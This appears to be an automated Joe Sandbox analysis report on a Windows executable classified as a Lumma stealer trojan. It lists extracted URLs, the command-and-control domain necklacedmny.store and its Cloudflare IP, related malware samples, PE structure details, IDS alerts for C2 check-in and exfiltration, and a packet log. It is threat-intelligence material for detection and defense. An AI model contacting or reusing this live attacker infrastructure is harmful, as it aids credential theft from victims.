https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store// | file.exe, 00000000.00000002.2206644347.0000000001434000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apiI | file.exe, 00000000.00000002.2206720217.0000000001454000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                                          unknown
                                                          https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://necklacedmny.store/apirHfile.exe, 00000000.00000003.2153539401.0000000001429000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://necklacedmny.store/apibfile.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://necklacedmny.store/file.exe, file.exe, 00000000.00000003.2081624288.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2176681521.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153793686.0000000001432000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128973004.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126105987.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206644347.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106754751.0000000001431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://x1.c.lencr.org/0file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://x1.i.lencr.org/0file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://necklacedmny.store/apirXfile.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://necklacedmny.store/jpfile.exe, 00000000.00000002.2206362809.000000000136E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://necklacedmny.store/apis7file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://necklacedmny.store/apimfile.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://necklacedmny.store/Ofile.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106754751.0000000001431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://necklacedmny.store/apikfile.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
IP:188.114.97.3
Domain:necklacedmny.store
Country:European Union
ASN:13335
ASN Name:CLOUDFLARENETUS
Malicious:true
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1546270
                                                                            Start date and time:2024-10-31 17:25:09 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 5m 22s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:file.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                            EGA Information:Failed
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 1
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 1532 because there are no executed functions
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: file.exe
Time:12:26:01
Type:API Interceptor
Description:10x Sleep call for process: file.exe modified
Match:188.114.97.3 (associated sample name / URL; detection; threat name; context)
• 18in SPA-198-2024.exe; malicious; FormBook; context: www.timizoasisey.shop/3p0l/
• lf1SPbZI3V.exe; malicious; Lokibot; context: touxzw.ir/alpha2/five/fre.php
• Comprobante de pago.xlam.xlsx; malicious; AgentTesla; context: paste.ee/d/vdlzo
• Purchase_Order_pdf.exe; malicious; FormBook; context: www.bayarcepat19.click/g48c/
• zxalphamn.doc; malicious; Lokibot; context: touxzw.ir/alpha2/five/fre.php
• rPO-000172483.exe; malicious; FormBook; context: www.launchdreamidea.xyz/2b9b/
• rPO_28102400.exe; malicious; Lokibot; context: ghcopz.shop/ClarkB/PWS/fre.php
• PbfYaIvR5B.exe; malicious; DCRat, PureLog Stealer, zgRAT; context: windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
• SR3JZpolPo.exe; malicious; JohnWalkerTexasLoader; context: xilloolli.com/api.php?status=1&wallets=0&av=1
• 5Z1WFRMTOXRH6X21Z8NU8.exe; malicious; Unknown; context: artvisions-autoinsider.com/8bkjdSdfjCe/index.php
Match:necklacedmny.store (associated sample name / URL; detection; threat name; context)
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm; context: 188.114.96.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 188.114.97.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 188.114.97.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 188.114.96.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 188.114.96.3
• file.exe; malicious; LummaC; context: 188.114.96.3
• file.exe; malicious; LummaC; context: 188.114.97.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm; context: 188.114.97.3
• file.exe; malicious; LummaC; context: 188.114.96.3
• file.exe; malicious; LummaC; context: 188.114.96.3
Match:CLOUDFLARENETUS (associated sample name / URL; detection; threat name; context)
• file.exe; malicious; NetSupport RAT; context: 172.67.68.212
• rMT103_126021720924.exe; malicious; AgentTesla; context: 104.26.12.205
• file.exe; malicious; NetSupport RAT; context: 104.26.1.231
• Fw Message from Kevin - Update on Coles Supply Chain Modernisation 31-10-24.eml; malicious; Unknown; context: 104.18.36.155
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm; context: 188.114.96.3
• https://t.ly/4Nq2x; malicious; HTMLPhisher, Mamba2FA; context: 104.20.6.133
• INVOICE ATTACHMENT.exe; malicious; PureLog Stealer, Snake Keylogger; context: 188.114.96.3
• SilverSEAL Corporation -RFQ_RFP_FSR Proposal.pdf; malicious; Phisher; context: 188.114.96.3
• Y2EM7suNV5.exe; malicious; MassLogger RAT; context: 188.114.97.3
• https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918; malicious; Unknown; context: 104.16.79.73
Match:a0e9f5d64349fb13191bc781f81f42e1 (associated sample name / URL; detection; threat name; context)
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm; context: 188.114.97.3
• a.hta; malicious; DarkComet, DarkTortilla, Neshta; context: 188.114.97.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 188.114.97.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 188.114.97.3
• Set-Up.exe; malicious; LummaC; context: 188.114.97.3
• Loader.exe; malicious; LummaC; context: 188.114.97.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 188.114.97.3
• file.exe; malicious; LummaC; context: 188.114.97.3
• file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 188.114.97.3
• file.exe; malicious; LummaC; context: 188.114.97.3
                                                                            No context
                                                                            No created / dropped files found
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.535284090193369
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:file.exe
                                                                            File size:3'022'848 bytes
                                                                            MD5:55bfaa52fb91ccaa609fda3e4ba384f1
                                                                            SHA1:82e95791abe38fd20575fb1a92d9a51030012f61
                                                                            SHA256:8461b98ede75eee3c04396a1600422e47a21eb3d575ec02b3a913e66dbda3749
                                                                            SHA512:097c7aa785377092f632a6273bc9961791cc239e8ec75b932076f2d4f143d6475ec7430de146878f9c44066726a2478371d73365e337954bac054e338947a3fb
                                                                            SSDEEP:49152:Zq7bXIsnOEbQ9lKLzngSCPy86+ucZv4EurqRksC:wXIsbbQHKLzngSW6vq4Euriks
                                                                            TLSH:50E54A91A40972CFD0BA53B59837CE825D6D03F947250CC3986DB67A7E7BCC229B5C28
                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........01...........@..........................`1...........@.................................T...h..
                                                                            Icon Hash:00928e8e8686b000
                                                                            Entrypoint:0x713000
                                                                            Entrypoint Section:.taggant
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                            Instruction
                                                                            jmp 00007F65E45F5D0Ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], cl
                                                                            add byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            adc byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            push es
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x5a054          0x68          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x59000          0x340         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5a1f8          0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
(empty)   0x1000           0x58000       0x27e00   84a61f41378c44412f44085606263fb2  False     0.9979121767241379  data                  7.97049232338871    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x59000          0x340         0x400     914cd139a383496d0085d499d138ef92  False     0.390625            data                  4.997389973748798   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x5a000          0x1000        0x200     555a11fa24a077379003c187d9c9d020  False     0.14453125          data                  0.9996515881509258  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dxfnwksx  0x5b000          0x2b7000      0x2b6400  53b25ec0cbbba82b21982cb8c3b6fc5f  unknown   unknown             unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
neetjkms  0x312000         0x1000        0x600     fb633b4693f21eade42b562645994509  False     0.5794270833333334  data                  5.057751739314365   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  0x313000         0x3000        0x2200    164176864edcc0909ad98df9ae72ac41  False     0.06870404411764706 DOS executable (COM)  0.748878353315706   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name         RVA      Size   Type                                                      Language  Country  ZLIB Complexity
RT_MANIFEST  0x59058  0x2e6  XML 1.0 document, ASCII text, with CRLF line terminators                     0.45417789757412397
DLL           Import
kernel32.dll  lstrcpy
Timestamp                        SID      Signature                                                                                Severity  Source IP      Source Port  Dest IP        Dest Port  Protocol
2024-10-31T17:26:02.774640+0100  2057131  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)     1         192.168.2.5    60947        1.1.1.1        53         UDP
2024-10-31T17:26:02.797778+0100  2057129  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)      1         192.168.2.5    55927        1.1.1.1        53         UDP
2024-10-31T17:26:02.812763+0100  2057127  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)     1         192.168.2.5    62287        1.1.1.1        53         UDP
2024-10-31T17:26:02.824202+0100  2057125  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)     1         192.168.2.5    56217        1.1.1.1        53         UDP
2024-10-31T17:26:02.837665+0100  2057123  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)    1         192.168.2.5    51900        1.1.1.1        53         UDP
2024-10-31T17:26:03.499606+0100  2057124  ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)  1         192.168.2.5    49704        188.114.97.3   443        TCP
2024-10-31T17:26:03.499606+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                                3         192.168.2.5    49704        188.114.97.3   443        TCP
2024-10-31T17:26:04.312757+0100  2049836  ET MALWARE Lumma Stealer Related Activity                                                1         192.168.2.5    49704        188.114.97.3   443        TCP
2024-10-31T17:26:04.312757+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                                1         192.168.2.5    49704        188.114.97.3   443        TCP
2024-10-31T17:26:05.047853+0100  2057124  ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)  1         192.168.2.5    49705        188.114.97.3   443        TCP
2024-10-31T17:26:05.047853+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                                3         192.168.2.5    49705        188.114.97.3   443        TCP
2024-10-31T17:26:06.296342+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2                                             1         192.168.2.5    49705        188.114.97.3   443        TCP
2024-10-31T17:26:06.296342+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                                1         192.168.2.5    49705        188.114.97.3   443        TCP
2024-10-31T17:26:07.427537+0100  2057124  ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)  1         192.168.2.5    49706        188.114.97.3   443        TCP
2024-10-31T17:26:07.427537+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                                3         192.168.2.5    49706        188.114.97.3   443        TCP
2024-10-31T17:26:09.643578+0100  2057124  ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)  1         192.168.2.5    49707        188.114.97.3   443        TCP
2024-10-31T17:26:09.643578+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                                3         192.168.2.5    49707        188.114.97.3   443        TCP
2024-10-31T17:26:10.884020+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                                    1         192.168.2.5    49707        188.114.97.3   443        TCP
2024-10-31T17:26:11.826936+0100  2057124  ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)  1         192.168.2.5    49708        188.114.97.3   443        TCP
2024-10-31T17:26:11.826936+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                                3         192.168.2.5    49708        188.114.97.3   443        TCP
2024-10-31T17:26:14.841620+0100  2057124  ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)  1         192.168.2.5    49709        188.114.97.3   443        TCP
2024-10-31T17:26:14.841620+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                                3         192.168.2.5    49709        188.114.97.3   443        TCP
2024-10-31T17:26:16.600929+0100  2057124  ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)  1         192.168.2.5    49710        188.114.97.3   443        TCP
2024-10-31T17:26:16.600929+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                                3         192.168.2.5    49710        188.114.97.3   443        TCP
2024-10-31T17:26:18.763888+0100  2057124  ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)  1         192.168.2.5    49713        188.114.97.3   443        TCP
2024-10-31T17:26:18.763888+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                                3         192.168.2.5    49713        188.114.97.3   443        TCP
2024-10-31T17:26:19.694593+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow                   1         52.149.20.212  443          192.168.2.5    49711      TCP
2024-10-31T17:26:58.088523+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow                   1         52.149.20.212  443          192.168.2.5    49910      TCP
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 31, 2024 17:26:02.868242025 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:02.868285894 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:02.868356943 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:02.874391079 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:02.874404907 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:03.499475956 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:03.499605894 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:03.511753082 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:03.511776924 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:03.512489080 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:03.560486078 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:03.823069096 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:03.823096037 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:03.823203087 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:04.312762022 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:04.312850952 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:04.312920094 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:04.314589977 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:04.314604998 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:04.314623117 CET  49704        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:04.314629078 CET  443          49704      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:04.420149088 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:04.420203924 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:04.420301914 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:04.420711040 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:04.420723915 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:05.047703981 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:05.047852993 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:05.049293041 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:05.049305916 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:05.049532890 CET  443          49705      188.114.97.3   192.168.2.5
Oct 31, 2024 17:26:05.050781965 CET  49705        443        192.168.2.5    188.114.97.3
Oct 31, 2024 17:26:05.050808907 CET  49705        443        192.168.2.5    188.114.97.3
